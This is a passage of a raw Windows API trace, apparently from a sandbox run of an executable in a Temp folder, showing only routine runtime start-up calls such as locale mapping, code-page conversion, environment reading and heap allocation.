\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.340] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0243.341] GetLastError () returned 0x7e [0243.342] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0243.342] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.342] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f298, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0243.342] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fc60, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¸Zìw\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd60, cbMultiByte=256, lpWideCharStr=0x18f4b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.342] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.342] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f2a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0243.342] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fb60, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¸Zìw\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.387] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x80) returned 0xa86220 [0243.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fca8, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe")) returned 0x2d [0243.388] GetProcAddress (hModule=0x769b0000, lpProcName="AreFileApisANSI") returned 0x76a44671 [0243.388] AreFileApisANSI () returned 1 [0243.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0243.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", cchWideChar=-1, lpMultiByteStr=0x47d770, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", lpUsedDefaultChar=0x0) returned 46 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x36) returned 0xa880e0 [0243.389] RtlInitializeSListHead (in: ListHead=0x47d210 | out: ListHead=0x47d210) [0243.389] GetLastError () returned 0x0 [0243.389] SetLastError (dwErrCode=0x0) [0243.389] GetEnvironmentStringsW () returned 0xa89b48* [0243.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1443 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x5a3) returned 0xa8a698 [0243.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0xa8a698, cbMultiByte=1443, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1443 [0243.389] FreeEnvironmentStringsW (penv=0xa89b48) returned 1 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x9c) returned 0xa89b48 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1f) returned 0xa898b0 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x2b) returned 0xa86c88 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x37) returned 0xa89bf0 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x3c) returned 0xa89c30 [0243.389] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x31) returned 0xa89c78 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x18) returned 0xa88120 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x24) returned 0xa86488 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x14) returned 0xa845e0 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xd) returned 0xa84768 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1a) returned 0xa898d8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x2e) returned 0xa86cc0 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x19) returned 0xa89900 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x17) returned 0xa89cb8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xe) returned 0xa84780 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x95) returned 0xa89cd8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x3e) returned 0xa8ac60 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1b) returned 0xa89928 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1d) returned 0xa89950 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x48) returned 0xa89d78 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x12) returned 0xa89dc8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x18) returned 0xa89de8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1b) returned 0xa89978 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x24) returned 0xa864b8 [0243.390] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x29) returned 0xa86cf8 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1e) returned 0xa899a0 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x6b) returned 0xa89e08 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x17) returned 0xa89e80 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x14) returned 0xa89ea0 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xf) returned 0xa84798 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x16) returned 0xa89ec0 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x2a) returned 0xa86d30 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x29) returned 0xa86d68 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x16) returned 0xa89ee0 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x13) returned 0xa89f00 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1f) returned 0xa899c8 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x12) returned 0xa89f20 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x18) returned 0xa8bc60 [0243.391] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x46) returned 0xa89f40 [0243.392] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8a698 | out: hHeap=0xa70000) returned 1 [0243.413] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x800) returned 0xa8c448 [0243.414] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0243.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4071e3) returned 0x0 [0243.490] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa84600 [0243.490] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x76fe0000 [0243.491] GetProcAddress (hModule=0x76fe0000, lpProcName="CompareStringEx") returned 0x77016a72 [0243.491] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesEx") returned 0x76a447ef [0243.491] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0243.491] GetLastError () returned 0x7e [0243.492] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatEx") returned 0x76a56c26 [0243.492] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoEx") returned 0x76a44cf1 [0243.492] GetProcAddress (hModule=0x769b0000, lpProcName="GetTimeFormatEx") returned 0x76a56ba1 [0243.493] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLocaleName") returned 0x76a44d61 [0243.493] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocaleName") returned 0x76a44d81 [0243.493] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0243.493] GetLastError () returned 0x7e [0243.494] GetProcAddress (hModule=0x769b0000, lpProcName="LCIDToLocaleName") returned 0x769ecec4 [0243.494] GetProcAddress (hModule=0x769b0000, lpProcName="LocaleNameToLCID") returned 0x76a44da1 [0243.494] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x20) returned 0xa8a468 [0243.494] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa88140 [0243.494] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa88140 | out: hHeap=0xa70000) returned 1 [0243.494] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa88140 [0243.550] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa862a8 [0243.550] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x18) returned 0xa8bc80 [0243.550] GetLastError () returned 0x7e [0243.550] SetLastError (dwErrCode=0x7e) [0243.550] GetLastError () returned 0x7e [0243.550] SetLastError (dwErrCode=0x7e) [0243.550] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cc50 [0243.550] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8cd10 [0243.551] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cd10 | out: hHeap=0xa70000) returned 1 [0243.552] GetLastError () returned 0x7e [0243.552] SetLastError (dwErrCode=0x7e) [0243.552] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0243.552] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8abe8 [0243.552] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8abf8 [0243.552] GetLastError () returned 0x7e [0243.552] SetLastError (dwErrCode=0x7e) [0243.552] GetLastError () returned 0x7e [0243.552] SetLastError (dwErrCode=0x7e) [0243.552] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cd10 [0243.552] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8cdd0 [0243.552] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cdd0 | out: hHeap=0xa70000) returned 1 [0243.552] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0243.553] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc50 | out: hHeap=0xa70000) returned 1 [0243.553] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abf8 | out: hHeap=0xa70000) returned 1 [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8abf8 [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x200) returned 0xa8cdd0 [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8ac08 [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] GetLastError () returned 0x7e [0243.553] SetLastError (dwErrCode=0x7e) [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cc50 [0243.553] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8cfd8 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cfd8 | out: hHeap=0xa70000) returned 1 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cd10 | out: hHeap=0xa70000) returned 1 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac08 | out: hHeap=0xa70000) returned 1 [0243.554] GetLastError () returned 0x7e [0243.554] SetLastError (dwErrCode=0x7e) [0243.554] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abf8 | out: hHeap=0xa70000) returned 1 [0243.554] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abe8 | out: hHeap=0xa70000) returned 1 [0243.554] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa8abe8 [0245.679] GetLastError () returned 0x57 [0245.679] SetLastError (dwErrCode=0x57) [0245.695] GetLastError () returned 0x57 [0245.695] SetLastError (dwErrCode=0x57) [0245.695] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1000) returned 0xa8cfd8 [0245.695] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.696] GetLastError () returned 0x57 [0245.696] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () 